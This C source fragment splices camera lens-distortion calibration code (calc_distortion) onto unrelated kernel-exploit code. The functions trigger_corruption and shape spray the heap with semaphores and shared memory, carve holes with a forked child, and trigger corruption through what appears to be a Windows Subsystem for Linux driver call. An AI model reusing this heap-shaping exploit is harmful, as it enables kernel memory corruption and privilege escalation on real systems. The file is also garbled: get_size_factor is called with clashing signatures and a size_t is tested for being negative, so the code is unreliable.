void calc_distortion( CALIB_PATT_T *patt, int xsize, int ysize, double dist_factor[4] )
{
int i, j;
double bx, by;
double bf[4];
double error, min;
double factor[4];
bx = xsize / 2;
by = ysize / 2;
factor[0] = bx;
factor[1] = by;
factor[3] = 1.0;
min = calc_distortion2( patt, factor );
bf[0] = factor[0];
bf[1] = factor[1];
bf[2] = factor[2];
bf[3] = 1.0;
printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min);
for( j = -10; j <= 10; j++ ) {
factor[1] = by + j*5;
for( i = -10; i <= 10; i++ ) {
factor[0] = bx + i*5;
error = calc_distortion2( patt, factor );
if( error < min ) {
bf[0] = factor[0];
bf[1] = factor[1];
bf[2] = factor[2];
min = error;
}
}
printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min);
}
bx = bf[0];
by = bf[1];
for( j = -10; j <= 10; j++ ) {
factor[1] = by + 0.5 * j;
for( i = -10; i <= 10; i++ ) {
factor[0] = bx + 0.5 * i;
error = calc_distortion2( patt, factor );
if( error < min ) {
bf[0] = factor[0];
bf[1] = factor[1];
bf[2] = factor[2];
min = error;
}
}
printf("[%5.1f, %5.1f, %5.1f] %f\n", bf[0], bf[1], bf[2], min);
}
dist_factor[0] = bf[0];
dist_factor[1] = bf[1];
dist_factor[2] = bf[2];
dist_factor[3] = get_size_factor( bf, xsize, ysize );
}
int trigger_corruption(int spray_size) {
size_t factor = 0, alloc_size, stopIdx;
int ret;
alloc_size = get_size_factor(spray_size, &factor);
if (alloc_size < 0) {
printf("[*err*] unsupported spray_size == 0x%x", spray_size);
return -1;
}
stopIdx = calc_stop_idx(alloc_size, factor);
ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
printf("[*] trigger_corruption() returned 0x%x\n", ret);
return 0;
}
int shape(size_t *spray_size) {
size_t keys[0x400];
int exec[2];
int sv[2];
char flag;
size_t bytes = 0, tofree = 0;
size_t factor,hole_size;
struct flock fl;
memset(&fl, 0, sizeof(fl));
pid_t pid, wpid;
int status;
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
printf("[*err] socketpair failed\n");
return 1;
}
bytes = spray(1);
if (bytes == (size_t)-1) {
printf("[*err*] bytes < 0, are you root?\n");
return 1;
}
*spray_size = bytes;
hole_size = get_size_factor(*spray_size, &factor);
tofree = hole_size / (bytes / 1) + 1;
printf("[*] allocate holes before the workspace\n");
for (int i = 0; i < 0x400; ++i) {
keys[i] = alloc_sem(0x7000);
}
for (int i = 0; i < 0x20; ++i) {
alloc_sem(0x7000);
}
for (int i = 0; i < 0x2000; ++i) {
alloc_sem(4063);
}
for (int i = 0; i < 0x2000; ++i) {
alloc_sem(3);
}
pid = fork();
if (pid > 0) {
printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
bytes = spray(5);
write(sv[1], "p", 1);
read(sv[1], &flag, 1);
} else {
// son
read(sv[0], &flag, 1);
printf("[*] alloc workspace pages\n");
bytes = spray(tofree);
printf("[*] finish allocate workspace allocations\n");
write(sv[0], "p", 1);
}
if (pid > 0) {
printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
for (int i = 0; i < 0x100; ++i) {
alloc_sem(4061);
for (int j = 0; j < 0x5; ++j) {
alloc_shm(i * 0x100 + j);
}
}
write(sv[1], "p", 1);
} else {
read(sv[0], &flag, 1);
printf("[*] free middle allocation, creating workspace freed\n");
exit(1);
}
while ((wpid = wait(&status)) > 0);
printf("[*] free prepared holes, create little pages holes before the workspace\n");
for (int i = 0; i < 0x400; ++i) {
free_sem(keys[i]);
}
return 0;
}
